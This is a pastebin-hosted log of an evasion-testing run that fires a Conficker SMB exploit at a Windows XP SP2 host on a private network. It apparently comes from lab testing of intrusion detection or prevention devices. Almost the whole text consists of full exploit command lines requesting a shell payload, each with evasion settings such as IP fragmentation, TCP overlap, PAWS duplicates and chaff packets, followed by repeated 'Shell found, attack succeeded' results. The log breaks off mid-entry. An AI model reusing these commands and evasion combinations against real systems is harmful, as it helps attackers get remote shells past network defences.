Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- SECURITY BREACHES: 423 | DURATION: 43229 SEC
- Info: Running exploit with command "ruby mongbat.rb --uid=webgui2_8000 --attack=conficker --payload=shell --check_victim=false --iface=eth0 --attacker=10.62.90.110 --victim=10.35.1.207 --gw=10.62.90.3 --mode=random --time=43200 --workers=10 --min_evasions=2 --max_evasions=3 --passthrough --verifydelay=1000"
- 2015-06-07 23:19:27 INFO Using binary /root/evader/evader version 2013.2.586 ( x86, o, evc4 )
- 2015-06-07 23:19:27 INFO Victim check disabled - will NOT notice if victim is no longer running
- 2015-06-07 23:19:29 INFO Using rand seed Wcn7q/xCpWQ=
- 2015-06-07 23:19:29 WARN evader is already running ; this may cause VICTIM CHECK FAILED messages!
- 2015-06-07 23:19:29 INFO External Validator: /root/evader/externals/conficker_validator.rb: Validate Conficker against Windows XP SP2
- Starting evasions generator: Random evasions generator (Evasion adding percentage is 0.0028169014084507044)
- ..
- 2 runs averaging 1.63 runs / second ; progress: 1/43200...................2015-06-07 23:19:33 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62021 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=P2RHsq/Wcjc --evasion=[msrpc_bind,msrpc_req]ipv4_frag,"24" --evasion=[msrpc_req,end]tcp_paws,"1","268435453","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed P2RHsq/Wcjc
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - IPv4 fragments with at most 24 bytes per fragment
- The following evasions are applied from stage msrpc_req to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.111:62021 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- ...............2015-06-07 23:19:36 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=51525 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=ElGy0J/TZpw --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"7","3","7","random_msrpcreq" --evasion=[smb_openpipe,msrpc_bind]tcp_overlap,"1479","new","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed ElGy0J/TZpw
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Before normal SMB writes, 7 SMB trees are opened and 3 writes are performed to them. The write payload is 7 bytes of MSRPC request-like data.
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - TCP segments are set to overlap by 1479 bytes, with the later packet containing the correct payload. Overlapping part has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.117:51525 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..
- 40 runs averaging 6.31 runs / second ; progress: 6/43200..............................
- 70 runs averaging 6.13 runs / second ; progress: 11/43200.........................
- 95 runs averaging 5.76 runs / second ; progress: 16/43200.........................
- 120 runs averaging 5.57 runs / second ; progress: 22/43200.....2015-06-07 23:19:52 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=13515 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=IR1Yko0dPgg --evasion=[smb_opentree,smb_openpipe]netbios_chaff,"3","empty_unspec|empty_keepalive|small_unspec|http_post|broken_length" --evasion=[smb_opentree,end]tcp_paws,"1","117616708","random_alpha" --evasion=[smb_connect,smb_opentree]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed IR1Yko0dPgg
- The following evasions are applied from stage smb_connect to smb_opentree:
- - TCP timestamps echo reply value is sent in the wrong endianness
- The following evasions are applied from stage smb_opentree to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 117616708> and has random alpha bytes as payload
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - Before every 3th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- Info: NetBIOS connection 10.62.90.118:13515 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .............2015-06-07 23:19:54 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=58996 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=dJz7n8sKZ9A --evasion=[smb_opentree,end]tcp_chaff,"75%","nullchksum|nullflag|outofwindow","random" --evasion=[smb_connect,end]tcp_overlap,"5","new","random_alphanum" --evasion=[netbios_connect,msrpc_req]tcp_paws,"1","5","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed dJz7n8sKZ9B
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_connect to end:
- - TCP segments are set to overlap by 5 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_opentree to end:
- - 75% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * NULL TCP checksum.
- * NULL TCP control flags.
- * An out-of-window sequence number.
- * Duplicate packet has random bytes as payload
- Info: NetBIOS connection 10.62.90.110:58996 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ........2015-06-07 23:19:55 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=53735 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=Q1Ry+56Ny4g --evasion=[smb_opentree,end]smb_decoytrees,"5","6","7","random_msrpcreq" --evasion=[smb_connect,msrpc_bind]smb_writeandxpad,"3","random_alphanum" --evasion=[smb_opentree,msrpc_bind]tcp_chaff,"75%","nullchksum|nullflag|outofwindow|shorthdr","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed Q1Ry+56Ny4h
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - 3 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - 75% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * NULL TCP checksum.
- * NULL TCP control flags.
- * An out-of-window sequence number.
- * TCP header shorter than 20 bytes
- * Duplicate packet has shuffled original payload
- The following evasions are applied from stage smb_opentree to end:
- - Before normal SMB writes, 5 SMB trees are opened and 6 writes are performed to them. The write payload is 7 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.110:53735 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ......
- 155 runs averaging 5.83 runs / second ; progress: 27/43200.................2015-06-07 23:19:59 INFO
- Success. (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24638 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=Ufs+GHrFFUA --evasion=[netbios_connect,msrpc_bind]ipv4_frag,"32" --evasion=[smb_opentree,msrpc_req]ipv4_order,"firstlast" --evasion=[smb_connect,msrpc_req]tcp_paws,"5","5","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed Ufs+GHrFFUB
- The following evasions are applied from stage netbios_connect to msrpc_bind:
- - IPv4 fragments with at most 32 bytes per fragment
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random alpha bytes as payload
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - IPv4 fragments are sent in correct order except that the first fragment comes last
- Info: NetBIOS connection 10.62.90.114:24638 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...2015-06-07 23:20:00 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=13965 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=UB07gamyjBM --evasion=[smb_connect,end]tcp_paws,"50%","215801129","alphanumrandomized" --evasion=[smb_opentree,smb_openpipe]tcp_paws,"50%","190724998","random" --verifydelay=1000 --payload=shell
- Info: Using random seed UB07gamyjBN
- The following evasions are applied from stage smb_connect to end:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 215801129> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 190724998> and has random bytes as payload
- Info: NetBIOS connection 10.62.90.113:13965 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- ........
- 185 runs averaging 5.83 runs / second ; progress: 32/43200...2015-06-07 23:20:03 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26112 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=MkfDE4ODgEw --evasion=[msrpc_req,end]smb_chaff,"2","write_flag","rand" --evasion=[smb_opentree,msrpc_req]tcp_paws,"50%","4","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed MkfDE4ODgEw
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage msrpc_req to end:
- - Before every 2th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random payload
- Info: NetBIOS connection 10.62.90.117:26112 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- ..................
- 207 runs averaging 5.63 runs / second ; progress: 37/43200...............
- 222 runs averaging 5.31 runs / second ; progress: 42/43200...........
- 233 runs averaging 4.98 runs / second ; progress: 47/43200............
- 245 runs averaging 4.73 runs / second ; progress: 52/43200.............
- 258 runs averaging 4.54 runs / second ; progress: 57/43200..............
- 272 runs averaging 4.39 runs / second ; progress: 62/43200................
- 288 runs averaging 4.30 runs / second ; progress: 67/43200.....................
- 309 runs averaging 4.30 runs / second ; progress: 72/43200..............
- 323 runs averaging 4.20 runs / second ; progress: 77/43200.....
- 328 runs averaging 4.00 runs / second ; progress: 82/43200......
- 334 runs averaging 3.84 runs / second ; progress: 87/43200.......2015-06-07 23:21:01 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=21232 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=AjLLEsF6RyU --evasion=[smb_openpipe,msrpc_req]smb_writeandxpad,"349","random" --evasion=[smb_opentree,msrpc_req]tcp_chaff,"21","chksum|shorthdr","alphanumrandomized" --evasion=[smb_opentree,msrpc_req]tcp_paws,"3","268435453","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed AjLLEsF6RyU
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - With every 21 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * Invalid TCP checksum.
- * TCP header shorter than 20 bytes
- * Duplicate packet has original payload with alphanumeric bytes randomized
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - 349 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random bytes.
- Info: NetBIOS connection 10.62.90.112:21232 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ...
- 345 runs averaging 3.75 runs / second ; progress: 92/43200................
- 361 runs averaging 3.72 runs / second ; progress: 97/43200......2015-06-07 23:21:09 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=22183 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=gueqfnfgtKk --evasion=tcp_nocwnd --evasion=[smb_openpipe,end]tcp_paws,"2","268435455","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed gueqfnfgtKm
- - TCP congestion window is not used.
- The following evasions are applied from stage smb_openpipe to end:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.118:22183 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...........
- 379 runs averaging 3.71 runs / second ; progress: 102/43200.........
- 388 runs averaging 3.62 runs / second ; progress: 107/43200......
- 394 runs averaging 3.51 runs / second ; progress: 112/43200.......2015-06-07 23:21:27 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=10588 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=WTkrkazPR60 --evasion=[smb_opentree,msrpc_req]tcp_paws,"3","111364770","alphanumrandomized" --evasion=[netbios_connect,end]tcp_recv_window,"1048575" --verifydelay=1000 --payload=shell
- Info: Using random seed WTkrkazPR61
- The following evasions are applied from stage netbios_connect to end:
- - TCP receive window is set to at most 1048575 bytes.
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 111364770> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.118:10588 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .
- 403 runs averaging 3.44 runs / second ; progress: 117/43200...............
- 418 runs averaging 3.42 runs / second ; progress: 122/43200.........2015-06-07 23:21:36 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=43982 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=00v8sOxbBJs --evasion=[smb_opentree,msrpc_req]ipv4_frag,"16" --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"5","5","7","random_msrpcbind" --verifydelay=1000 --payload=shell
- Info: Using random seed 00v8sOxbBJv
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - IPv4 fragments with at most 16 bytes per fragment
- - Before normal SMB writes, 5 SMB trees are opened and 5 writes are performed to them. The write payload is 7 bytes of MSRPC bind-like data.
- Info: NetBIOS connection 10.62.90.112:43982 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 431 runs averaging 3.38 runs / second ; progress: 127/43200...........
- 442 runs averaging 3.34 runs / second ; progress: 132/43200...........
- 453 runs averaging 3.30 runs / second ; progress: 137/43200.......
- 460 runs averaging 3.23 runs / second ; progress: 142/43200........
- 468 runs averaging 3.17 runs / second ; progress: 147/43200..
- 470 runs averaging 3.08 runs / second ; progress: 152/43200.....
- 475 runs averaging 3.02 runs / second ; progress: 157/43200..2015-06-07 23:22:09 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=19364 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=FcbWMtZoa2Y --evasion=[smb_connect,smb_opentree]smb_writeandxpad,"439","random" --evasion=[smb_openpipe,end]tcp_paws,"25%","9","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed FcbWMtZoa2Y
- The following evasions are applied from stage smb_connect to smb_opentree:
- - 439 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random bytes.
- The following evasions are applied from stage smb_openpipe to end:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.117:19364 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .
- 479 runs averaging 2.95 runs / second ; progress: 162/43200...
- 482 runs averaging 2.88 runs / second ; progress: 167/43200
- 482 runs averaging 2.79 runs / second ; progress: 172/43200............
- 494 runs averaging 2.78 runs / second ; progress: 177/43200.....................
- 515 runs averaging 2.82 runs / second ; progress: 182/43200.........
- 524 runs averaging 2.79 runs / second ; progress: 188/43200.....
- 529 runs averaging 2.75 runs / second ; progress: 193/43200
- 529 runs averaging 2.68 runs / second ; progress: 198/43200.......2015-06-07 23:22:50 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=61516 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=s09eyA+Hq5o --evasion=[smb_opentree,end]tcp_paws,"13","8","random_alphanum" --evasion=[smb_openpipe,end]tcp_paws,"1","9","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed s09eyA+Hq5q
- The following evasions are applied from stage smb_opentree to end:
- - Every 13th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_openpipe to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.117:61516 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ......
- 543 runs averaging 2.68 runs / second ; progress: 203/43200..2015-06-07 23:22:53 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=32101 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=7vh9Q4gm0XQ --evasion=[smb_connect,end]ipv4_opt,"8","inc","alphanumrandomized" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"1","14791099","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed 7vh9Q4gm0XT
- The following evasions are applied from stage smb_connect to end:
- - Every 8th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has identical payload except that alphanumeric characters are randomized
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 14791099> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.113:32101 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ............
- 558 runs averaging 2.69 runs / second ; progress: 208/43200.......
- 565 runs averaging 2.66 runs / second ; progress: 213/43200......
- 571 runs averaging 2.62 runs / second ; progress: 218/43200....
- 575 runs averaging 2.58 runs / second ; progress: 223/43200.......2015-06-07 23:23:16 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29396 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=lVpgbd+BmFc --evasion=[smb_connect,msrpc_req]ipv4_opt,"3","inc","zero" --evasion=[smb_connect,end]tcp_paws,"1","268435455","shuffle" --evasion=[netbios_connect,end]tcp_recv_window,"269717" --verifydelay=1000 --payload=shell
- Info: Using random seed lVpgbd+BmFe
- The following evasions are applied from stage netbios_connect to end:
- - TCP receive window is set to at most 269717 bytes.
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has NULL bytes for payload
- The following evasions are applied from stage smb_connect to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has shuffled original payload
- Info: NetBIOS connection 10.62.90.113:29396 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ......
- 589 runs averaging 2.59 runs / second ; progress: 228/43200...................
- 608 runs averaging 2.61 runs / second ; progress: 233/43200.....
- 613 runs averaging 2.58 runs / second ; progress: 238/43200...
- 616 runs averaging 2.54 runs / second ; progress: 243/43200..
- 618 runs averaging 2.49 runs / second ; progress: 248/43200..........
- 628 runs averaging 2.48 runs / second ; progress: 253/43200.......
- 635 runs averaging 2.46 runs / second ; progress: 258/432002015-06-07 23:23:48 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34169 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=Deh5nhWGiuo --evasion=[smb_opentree,msrpc_bind]smb_decoytrees,"2","1","2047","random" --evasion=[netbios_connect,end]tcp_paws,"1","46504624","random_alphanum" --evasion=[netbios_connect,end]tcp_segvar,"3","20067" --verifydelay=1000 --payload=shell
- Info: Using random seed Deh5nhWGiuo
- The following evasions are applied from stage netbios_connect to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 46504624> and has random alphanumeric bytes as payload
- - TCP packets are segmented to contain between 3 and 20067 bytes of payload.
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Before normal SMB writes, 2 SMB trees are opened and 1 writes are performed to them. The write payload is 2047 random bytes.
- Info: NetBIOS connection 10.62.90.118:34169 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 2015-06-07 23:23:50 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=49654 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=AgruJf0YDvE --evasion=[netbios_connect,msrpc_bind]ipv4_frag,"1112" --evasion=[smb_connect,msrpc_req]ipv4_frag,"24" --evasion=[smb_openpipe,end]tcp_paws,"2","268435455","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed AgruJf0YDvE
- The following evasions are applied from stage netbios_connect to msrpc_bind:
- - IPv4 fragments with at most 1112 bytes per fragment
- The following evasions are applied from stage smb_connect to msrpc_req:
- - IPv4 fragments with at most 24 bytes per fragment
- The following evasions are applied from stage smb_openpipe to end:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.118:49654 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..
- 639 runs averaging 2.43 runs / second ; progress: 263/43200..........
- 649 runs averaging 2.42 runs / second ; progress: 268/43200....
- 653 runs averaging 2.39 runs / second ; progress: 273/43200......
- 659 runs averaging 2.37 runs / second ; progress: 278/43200......
- 665 runs averaging 2.35 runs / second ; progress: 283/43200....
- 669 runs averaging 2.32 runs / second ; progress: 288/43200....
- 673 runs averaging 2.30 runs / second ; progress: 293/43200.......
- 680 runs averaging 2.28 runs / second ; progress: 298/43200.........Pid 27321 timed out - killed
- 2015-06-07 23:24:31 INFO
- Timed out (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=48251 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=FadBcaLVpzM --evasion=[smb_openpipe,msrpc_bind]tcp_overlap,"1478","new","zero" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"1","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed FadBcaLVpzM
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - TCP segments are set to overlap by 1478 bytes, with the later packet containing the correct payload. Overlapping part has 0x00 bytes as payload
- - Add a zero urgent data byte to every 1 TCP segment.
- Info: NetBIOS connection 10.62.90.119:48251 -> 10.35.1.207:445
- Terminated
- ..
- 692 runs averaging 2.28 runs / second ; progress: 303/43200......
- 698 runs averaging 2.27 runs / second ; progress: 308/43200.......
- 705 runs averaging 2.25 runs / second ; progress: 313/43200....2015-06-07 23:24:47 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=60901 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=5rcJEIzKfQ8 --evasion=[smb_opentree,smb_openpipe]smb_chaff,"8","write_flag","msrpc" --evasion=[smb_connect,msrpc_bind]tcp_overlap,"10","new","random_alphanum" --evasion=[start,msrpc_req]tcp_paws,"50%","4","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed 5rcJEIzKfQ/
- The following evasions are applied from stage start to msrpc_req:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - TCP segments are set to overlap by 10 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_opentree to smb_openpipe:
